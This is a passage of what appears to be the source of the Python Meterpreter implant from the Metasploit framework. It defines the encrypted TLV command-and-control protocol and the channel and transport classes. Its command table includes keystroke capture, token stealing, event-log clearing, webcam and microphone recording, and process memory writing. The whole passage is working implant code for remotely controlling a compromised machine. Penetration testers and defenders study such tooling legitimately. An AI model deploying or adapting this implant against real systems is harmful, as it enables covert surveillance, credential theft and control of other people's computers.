is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
# reseed the random generator.
random.seed()
#
# Constants
#
# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
TRY_TO_FORK = True
HTTP_CONNECTION_URL = None
HTTP_PROXY = None
HTTP_USER_AGENT = None
HTTP_COOKIE = None
HTTP_HOST = None
HTTP_REFERER = None
PAYLOAD_UUID = ''
SESSION_GUID = ''
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_COMMAND_ID = TLV_META_TYPE_UINT | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_HEADERS = TLV_META_TYPE_STRING | 441
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 442
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_SESSION_GUID = TLV_META_TYPE_RAW | 462
TLV_TYPE_RSA_PUB_KEY = TLV_META_TYPE_RAW | 550
TLV_TYPE_SYM_KEY_TYPE = TLV_META_TYPE_UINT | 551
TLV_TYPE_SYM_KEY = TLV_META_TYPE_RAW | 552
TLV_TYPE_ENC_SYM_KEY = TLV_META_TYPE_RAW | 553
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
ENC_NONE = 0
ENC_AES256 = 1
# Packet header sizes
PACKET_XOR_KEY_SIZE = 4
PACKET_SESSION_GUID_SIZE = 16
PACKET_ENCRYPT_FLAG_SIZE = 4
PACKET_LENGTH_SIZE = 4
PACKET_TYPE_SIZE = 4
PACKET_LENGTH_OFF = (PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE +
PACKET_ENCRYPT_FLAG_SIZE)
PACKET_HEADER_SIZE = (PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE +
PACKET_ENCRYPT_FLAG_SIZE + PACKET_LENGTH_SIZE + PACKET_TYPE_SIZE)
# ---------------------------------------------------------------
# --- THIS CONTENT WAS GENERATED BY A TOOL @ 2020-05-01 05:29:59 UTC
EXTENSION_ID_CORE = 0
EXTENSION_ID_STDAPI = 1000
COMMAND_IDS = (
(1, 'core_channel_close'),
(2, 'core_channel_eof'),
(3, 'core_channel_interact'),
(4, 'core_channel_open'),
(5, 'core_channel_read'),
(6, 'core_channel_seek'),
(7, 'core_channel_tell'),
(8, 'core_channel_write'),
(9, 'core_console_write'),
(10, 'core_enumextcmd'),
(11, 'core_get_session_guid'),
(12, 'core_loadlib'),
(13, 'core_machine_id'),
(14, 'core_migrate'),
(15, 'core_native_arch'),
(16, 'core_negotiate_tlv_encryption'),
(17, 'core_patch_url'),
(18, 'core_pivot_add'),
(19, 'core_pivot_remove'),
(20, 'core_pivot_session_died'),
(21, 'core_set_session_guid'),
(22, 'core_set_uuid'),
(23, 'core_shutdown'),
(24, 'core_transport_add'),
(25, 'core_transport_change'),
(26, 'core_transport_getcerthash'),
(27, 'core_transport_list'),
(28, 'core_transport_next'),
(29, 'core_transport_prev'),
(30, 'core_transport_remove'),
(31, 'core_transport_setcerthash'),
(32, 'core_transport_set_timeouts'),
(33, 'core_transport_sleep'),
(1001, 'stdapi_fs_chdir'),
(1002, 'stdapi_fs_chmod'),
(1003, 'stdapi_fs_delete_dir'),
(1004, 'stdapi_fs_delete_file'),
(1005, 'stdapi_fs_file_copy'),
(1006, 'stdapi_fs_file_expand_path'),
(1007, 'stdapi_fs_file_move'),
(1008, 'stdapi_fs_getwd'),
(1009, 'stdapi_fs_ls'),
(1010, 'stdapi_fs_md5'),
(1011, 'stdapi_fs_mkdir'),
(1012, 'stdapi_fs_mount_show'),
(1013, 'stdapi_fs_search'),
(1014, 'stdapi_fs_separator'),
(1015, 'stdapi_fs_sha1'),
(1016, 'stdapi_fs_stat'),
(1017, 'stdapi_net_config_add_route'),
(1018, 'stdapi_net_config_get_arp_table'),
(1019, 'stdapi_net_config_get_interfaces'),
(1020, 'stdapi_net_config_get_netstat'),
(1021, 'stdapi_net_config_get_proxy'),
(1022, 'stdapi_net_config_get_routes'),
(1023, 'stdapi_net_config_remove_route'),
(1024, 'stdapi_net_resolve_host'),
(1025, 'stdapi_net_resolve_hosts'),
(1026, 'stdapi_net_socket_tcp_shutdown'),
(1027, 'stdapi_net_tcp_channel_open'),
(1028, 'stdapi_railgun_api'),
(1029, 'stdapi_railgun_api_multi'),
(1030, 'stdapi_railgun_memread'),
(1031, 'stdapi_railgun_memwrite'),
(1032, 'stdapi_registry_check_key_exists'),
(1033, 'stdapi_registry_close_key'),
(1034, 'stdapi_registry_create_key'),
(1035, 'stdapi_registry_delete_key'),
(1036, 'stdapi_registry_delete_value'),
(1037, 'stdapi_registry_enum_key'),
(1038, 'stdapi_registry_enum_key_direct'),
(1039, 'stdapi_registry_enum_value'),
(1040, 'stdapi_registry_enum_value_direct'),
(1041, 'stdapi_registry_load_key'),
(1042, 'stdapi_registry_open_key'),
(1043, 'stdapi_registry_open_remote_key'),
(1044, 'stdapi_registry_query_class'),
(1045, 'stdapi_registry_query_value'),
(1046, 'stdapi_registry_query_value_direct'),
(1047, 'stdapi_registry_set_value'),
(1048, 'stdapi_registry_set_value_direct'),
(1049, 'stdapi_registry_unload_key'),
(1050, 'stdapi_sys_config_driver_list'),
(1051, 'stdapi_sys_config_drop_token'),
(1052, 'stdapi_sys_config_getenv'),
(1053, 'stdapi_sys_config_getprivs'),
(1054, 'stdapi_sys_config_getsid'),
(1055, 'stdapi_sys_config_getuid'),
(1056, 'stdapi_sys_config_localtime'),
(1057, 'stdapi_sys_config_rev2self'),
(1058, 'stdapi_sys_config_steal_token'),
(1059, 'stdapi_sys_config_sysinfo'),
(1060, 'stdapi_sys_eventlog_clear'),
(1061, 'stdapi_sys_eventlog_close'),
(1062, 'stdapi_sys_eventlog_numrecords'),
(1063, 'stdapi_sys_eventlog_oldest'),
(1064, 'stdapi_sys_eventlog_open'),
(1065, 'stdapi_sys_eventlog_read'),
(1066, 'stdapi_sys_power_exitwindows'),
(1067, 'stdapi_sys_process_attach'),
(1068, 'stdapi_sys_process_close'),
(1069, 'stdapi_sys_process_execute'),
(1070, 'stdapi_sys_process_get_info'),
(1071, 'stdapi_sys_process_get_processes'),
(1072, 'stdapi_sys_process_getpid'),
(1073, 'stdapi_sys_process_image_get_images'),
(1074, 'stdapi_sys_process_image_get_proc_address'),
(1075, 'stdapi_sys_process_image_load'),
(1076, 'stdapi_sys_process_image_unload'),
(1077, 'stdapi_sys_process_kill'),
(1078, 'stdapi_sys_process_memory_allocate'),
(1079, 'stdapi_sys_process_memory_free'),
(1080, 'stdapi_sys_process_memory_lock'),
(1081, 'stdapi_sys_process_memory_protect'),
(1082, 'stdapi_sys_process_memory_query'),
(1083, 'stdapi_sys_process_memory_read'),
(1084, 'stdapi_sys_process_memory_unlock'),
(1085, 'stdapi_sys_process_memory_write'),
(1086, 'stdapi_sys_process_thread_close'),
(1087, 'stdapi_sys_process_thread_create'),
(1088, 'stdapi_sys_process_thread_get_threads'),
(1089, 'stdapi_sys_process_thread_open'),
(1090, 'stdapi_sys_process_thread_query_regs'),
(1091, 'stdapi_sys_process_thread_resume'),
(1092, 'stdapi_sys_process_thread_set_regs'),
(1093, 'stdapi_sys_process_thread_suspend'),
(1094, 'stdapi_sys_process_thread_terminate'),
(1095, 'stdapi_sys_process_wait'),
(1096, 'stdapi_ui_desktop_enum'),
(1097, 'stdapi_ui_desktop_get'),
(1098, 'stdapi_ui_desktop_screenshot'),
(1099, 'stdapi_ui_desktop_set'),
(1100, 'stdapi_ui_enable_keyboard'),
(1101, 'stdapi_ui_enable_mouse'),
(1102, 'stdapi_ui_get_idle_time'),
(1103, 'stdapi_ui_get_keys_utf8'),
(1104, 'stdapi_ui_send_keyevent'),
(1105, 'stdapi_ui_send_keys'),
(1106, 'stdapi_ui_send_mouse'),
(1107, 'stdapi_ui_start_keyscan'),
(1108, 'stdapi_ui_stop_keyscan'),
(1109, 'stdapi_ui_unlock_desktop'),
(1110, 'stdapi_webcam_audio_record'),
(1111, 'stdapi_webcam_get_frame'),
(1112, 'stdapi_webcam_list'),
(1113, 'stdapi_webcam_start'),
(1114, 'stdapi_webcam_stop'),
(1115, 'stdapi_audio_mic_start'),
(1116, 'stdapi_audio_mic_stop'),
(1117, 'stdapi_audio_mic_list'),
)
# ---------------------------------------------------------------
class SYSTEM_INFO(ctypes.Structure):
_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
("wReserved", ctypes.c_uint16),
("dwPageSize", ctypes.c_uint32),
("lpMinimumApplicationAddress", ctypes.c_void_p),
("lpMaximumApplicationAddress", ctypes.c_void_p),
("dwActiveProcessorMask", ctypes.c_uint32),
("dwNumberOfProcessors", ctypes.c_uint32),
("dwProcessorType", ctypes.c_uint32),
("dwAllocationGranularity", ctypes.c_uint32),
("wProcessorLevel", ctypes.c_uint16),
("wProcessorRevision", ctypes.c_uint16)]
def rand_bytes(n):
return os.urandom(n)
def rand_xor_key():
return tuple(random.randint(1, 255) for _ in range(4))
def xor_bytes(key, data):
if sys.version_info[0] < 3:
dexored = ''.join(chr(ord(data[i]) ^ key[i % len(key)]) for i in range(len(data)))
else:
dexored = bytes(data[i] ^ key[i % len(key)] for i in range(len(data)))
return dexored
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
return symbol
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in range(32))
@export
def cmd_id_to_string(this_id):
for that_id, that_string in COMMAND_IDS:
if this_id == that_id:
return that_string
debug_print('[*] failed to lookup string for command id: ' + str(this_id))
return None
@export
def cmd_string_to_id(this_string):
for that_id, that_string in COMMAND_IDS:
if this_string == that_string:
return that_id
debug_print('[*] failed to lookup id for command string: ' + this_string)
return None
@export
def crc16(data):
poly = 0x1021
reg = 0x0000
if is_str(data):
data = list(map(ord, data))
elif is_bytes(data):
data = list(data)
data.append(0)
data.append(0)
for byte in data:
mask = 0x80
while mask > 0:
reg <<= 1
if byte & mask:
reg += 1
mask >>= 1
if reg > 0xffff:
reg &= 0xffff
reg ^= poly
return reg
@export
def debug_print(msg):
if DEBUGGING:
print(msg)
@export
def debug_traceback(msg=None):
if DEBUGGING:
if msg:
print(msg)
traceback.print_exc(file=sys.stderr)
@export
def error_result(exception=None):
if not exception:
_, exception, _ = sys.exc_info()
exception_crc = crc16(exception.__class__.__name__)
if exception_crc == 0x4cb2: # WindowsError
return error_result_windows(exception.errno)
else:
result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
return result
@export
def error_result_windows(error_number=None):
if not has_windll:
return ERROR_FAILURE
if error_number == None:
error_number = ctypes.windll.kernel32.GetLastError()
if error_number > 0xffff:
return ERROR_FAILURE
result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
return result
@export
def get_hdd_label():
for _, _, files in os.walk('/dev/disk/by-id/'):
for f in files:
for p in ['ata-', 'mb-']:
if f[:len(p)] == p:
return f[len(p):]
return ''
@export
def get_native_arch():
arch = get_system_arch()
if arch == 'x64' and ctypes.sizeof(ctypes.c_void_p) == 4:
arch = 'x86'
return arch
@export
def get_system_arch():
uname_info = platform.uname()
arch = uname_info[4]
if has_windll:
sysinfo = SYSTEM_INFO()
ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
values = {0:'x86', 5:'armle', 6:'IA64', 9:'x64'}
arch = values.get(sysinfo.wProcessorArchitecture, uname_info[4])
if arch == 'x86_64':
arch = 'x64'
return arch
@export
def inet_pton(family, address):
if family == socket.AF_INET6 and '%' in address:
address = address.split('%', 1)[0]
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_enum_tlvs(pkt, tlv_type=None):
offset = 0
while offset < len(pkt):
tlv = struct.unpack('>II', pkt[offset:offset + 8])
if tlv_type is None or (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
val = pkt[offset + 8:(offset + 8 + (tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type': tlv[1], 'length': tlv[0], 'value': val}
offset += tlv[0]
return
@export
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
@export
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
else:
tlv = args[0]
data = ''
value = tlv['value']
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if isinstance(value, float):
value = int(round(value))
data = struct.pack('>III', 12, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
else:
if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
value = value.encode('UTF-8')
elif not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
@export
def tlv_pack_request(method, parts=None):
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_COMMAND_ID, cmd_string_to_id(method))
pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
parts = parts or []
for part in parts:
pkt += tlv_pack(part['type'], part['value'])
return pkt
#@export
class MeterpreterChannel(object):
def core_close(self, request, response):
self.close()
return ERROR_SUCCESS, response
def core_eof(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, self.eof())
return ERROR_SUCCESS, response
def core_read(self, request, response):
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, self.read(length))
return ERROR_SUCCESS, response
def core_write(self, request, response):
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
response += tlv_pack(TLV_TYPE_LENGTH, self.write(channel_data))
return ERROR_SUCCESS, response
def close(self):
raise NotImplementedError()
def eof(self):
return False
def is_alive(self):
return True
def notify(self):
return None
def read(self, length):
raise NotImplementedError()
def write(self, data):
raise NotImplementedError()
#@export
class MeterpreterFile(MeterpreterChannel):
def __init__(self, file_obj):
self.file_obj = file_obj
super(MeterpreterFile, self).__init__()
def close(self):
self.file_obj.close()
def eof(self):
return self.file_obj.tell() >= os.fstat(self.file_obj.fileno()).st_size
def read(self, length):
return self.file_obj.read(length)
def write(self, data):
self.file_obj.write(data)
return len(data)
export(MeterpreterFile)
#@export
class MeterpreterProcess(MeterpreterChannel):
def __init__(self, proc_h):
self.proc_h = proc_h
super(MeterpreterProcess, self).__init__()
def close(self):
self.proc_h.kill()
if hasattr(self.proc_h.stdin, 'close'):
self.proc_h.stdin.close()
if hasattr(self.proc_h.stdout, 'close'):
self.proc_h.stdout.close()
if hasattr(self.proc_h.stderr, 'close'):
self.proc_h.stderr.close()
def is_alive(self):
return self.proc_h.poll() is None
def read(self, length):
data = ''
stdout_reader = self.proc_h.stdout_reader
if stdout_reader.is_read_ready():
data = stdout_reader.read(length)
return data
def write(self, data):
self.proc_h.write(data)
return len(data)
export(MeterpreterProcess)
#@export
class MeterpreterSocket(MeterpreterChannel):
def __init__(self, sock):
self.sock = sock
self._is_alive = True
super(MeterpreterSocket, self).__init__()
def core_write(self, request, response):
try:
status, response = super(MeterpreterSocket, self).core_write(request, response)
except socket.error:
self.close()
self._is_alive = False
status = ERROR_FAILURE
return status, response
def close(self):
return self.sock.close()
def fileno(self):
return self.sock.fileno()
def is_alive(self):
return self._is_alive
def read(self, length):
return self.sock.recv(length)
def write(self, data):
return self.sock.send(data)
export(MeterpreterSocket)
#@export
class MeterpreterSocketTCPClient(MeterpreterSocket):
pass
export(MeterpreterSocketTCPClient)
#@export
class MeterpreterSocketTCPServer(MeterpreterSocket):
pass
export(MeterpreterSocketTCPServer)
#@export
class MeterpreterSocketUDPClient(MeterpreterSocket):
def __init__(self, sock, peer_address=None):
super(MeterpreterSocketUDPClient, self).__init__(sock)
self.peer_address = peer_address
def core_write(self, request, response):
peer_host = packet_get_tlv(request, TLV_TYPE_PEER_HOST).get('value')
peer_port = packet_get_tlv(request, TLV_TYPE_PEER_PORT).get('value')
if peer_host and peer_port:
peer_address = (peer_host, peer_port)
elif self.peer_address:
peer_address = self.peer_address
else:
raise RuntimeError('peer_host and peer_port must be specified with an unbound/unconnected UDP channel')
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
try:
length = self.sock.sendto(channel_data, peer_address)
except socket.error:
self.close()
self._is_alive = False
status = ERROR_FAILURE
else:
response += tlv_pack(TLV_TYPE_LENGTH, length)
status = ERROR_SUCCESS
return status, response
def read(self, length):
return self.sock.recvfrom(length)[0]
def write(self, data):
self.sock.sendto(data, self.peer_address)
export(MeterpreterSocketUDPClient)
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = bytes()
self.data_lock = threading.RLock()
def run(self):
for byte in iter(lambda: self.std.read(1), bytes()):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def peek(self, l = None):
data = bytes()
self.data_lock.acquire()
if l == None:
data = self.data
else:
data = self.data[0:l]
self.data_lock.release()
return data
def read(self, l = None):
self.data_lock.acquire()
data = self.peek(l)
self.data = self.data[len(data):]
self.data_lock.release()
return data
#@export
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
debug_print('[*] starting process: ' + repr(args[0]))
subprocess.Popen.__init__(self, *args, **kwargs)
self.echo_protection = False
def is_alive(self):
return self.poll() is None
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, self.is_alive)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, self.is_alive)
self.stderr_reader.start()
def write(self, channel_data):
length = self.stdin.write(channel_data)
self.stdin.flush()
if self.echo_protection:
end_time = time.time() + 0.5
out_data = bytes()
while (time.time() < end_time) and (out_data != channel_data):
if self.stdout_reader.is_read_ready():
out_data = self.stdout_reader.peek(len(channel_data))
if out_data == channel_data:
self.stdout_reader.read(len(channel_data))
return length
export(STDProcess)
class Transport(object):
def __init__(self):
self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
self.communication_last = 0
self.retry_total = SESSION_RETRY_TOTAL
self.retry_wait = SESSION_RETRY_WAIT
self.request_retire = False
self.aes_enabled = False
self.aes_key = None
def __repr__(self):
return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
@property
def communication_has_expired(self):
return self.communication_last + self.communication_timeout < time.time()
@property
def should_retire(self):
return self.communication_has_expired or self.request_retire
@staticmethod
def from_request(request):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if url.startswith('tcp'):
transport = TcpTransport(url)
elif url.startswith('http'):
proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
http_headers = packet_get_tlv(request, TLV_TYPE_TRANS_HEADERS).get('value', None)
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
if http_headers:
headers = {}
for h in http_headers.strip().split("\r\n"):
p = h.split(':')
headers[p[0].upper()] = ''.join(p[1:0])
http_host = headers.get('HOST')
http_cookie = headers.get('COOKIE')
http_referer = headers.get('REFERER')
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent, http_host=http_host,
http_cookie=http_cookie, http_referer=http_referer)
transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value', SESSION_COMMUNICATION_TIMEOUT)
transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value', SESSION_RETRY_TOTAL)
transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value', SESSION_RETRY_WAIT)
return transport
def _activate(self):
return True
def activate(self):
self.aes_key = None
self.aes_enabled = False
end_time = time.time() + self.retry_total
while time.time() < end_time:
try:
activate_succeeded = self._activate()
except:
activate_succeeded = False
if activate_succeeded:
self.communication_last = time.time()
return True
time.sleep(self.retry_wait)
return False
def _deactivate(self):
return
def deactivate(self):
try:
self._deactivate()
except:
pass
self.communication_last = 0
return True
def decrypt_packet(self, pkt):
if pkt and len(pkt) > PACKET_HEADER_SIZE:
xor_key = struct.unpack('BBBB', pkt[:PACKET_XOR_KEY_SIZE])
raw = xor_bytes(xor_key, pkt)
enc_offset = PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE
enc_flag = struct.unpack('>I', raw[enc_offset:enc_offset+PACKET_ENCRYPT_FLAG_SIZE])[0]
if enc_flag == ENC_AES256:
iv = raw[PACKET_HEADER_SIZE:PACKET_HEADER_SIZE+16]
encrypted = raw[PACKET_HEADER_SIZE+len(iv):]
return met_aes_decrypt(self.aes_key, iv, encrypted)
else:
return raw[PACKET_HEADER_SIZE:]
return None
def get_packet(self):
self.request_retire = False
try:
pkt = self.decrypt_packet(self._get_packet())
except:
debug_traceback()
return None
if pkt is None:
return None
self.communication_last = time.time()
return pkt
def encrypt_packet(self, pkt):
# The packet now has to contain session GUID and encryption flag info
# And given that we're not yet supporting AES, we're going to just
# always return the session guid and the encryption flag set to 0
enc_type = ENC_NONE
if self.aes_key:
# The encryption key is present, but we should only used the key
# when it is enabled. If we use it before it's enabled, then we
# end up encrypting the packet that contains the key before
# sending it back to MSF, and it won't be able to decrypt it yet.
if self.aes_enabled:
iv = rand_bytes(16)
enc = iv + met_aes_encrypt(self.aes_key, iv, pkt[8:])
hdr = struct.pack('>I', len(enc) + 8) + pkt[4:8]
pkt = hdr + enc
# We change the packet encryption type to tell MSF that
# the packet is encrypted.
enc_type = ENC_AES256
else:
# If we get here, it means that the AES encryption key
# is ready to use from this point onwards as the last
# plain text packet has been sent back to MSF containing
# the key, and so MSF will be able to handle encrypted
# communications from here.
self.aes_enabled = True
xor_key = rand_xor_key()
raw = binascii.a2b_hex(bytes(SESSION_GUID, 'UTF-8')) + struct.pack('>I', enc_type) + pkt
result = struct.pack('BBBB', *xor_key) + xor_bytes(xor_key, raw)
return result
def send_packet(self, pkt):
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.request_retire = False
try:
self._send_packet(self.encrypt_packet(pkt))
except:
debug_traceback()
return False
self.communication_last = time.time()
return True
def tlv_pack_timeouts(self):
response = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
return response
def tlv_pack_transport_group(self):
trans_group = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
trans_group += self.tlv_pack_timeouts()
return trans_group
class HttpTransport(Transport):
def __init__(self, url, proxy=None, user_agent=None, http_host=None, http_referer=None, http_cookie=None):
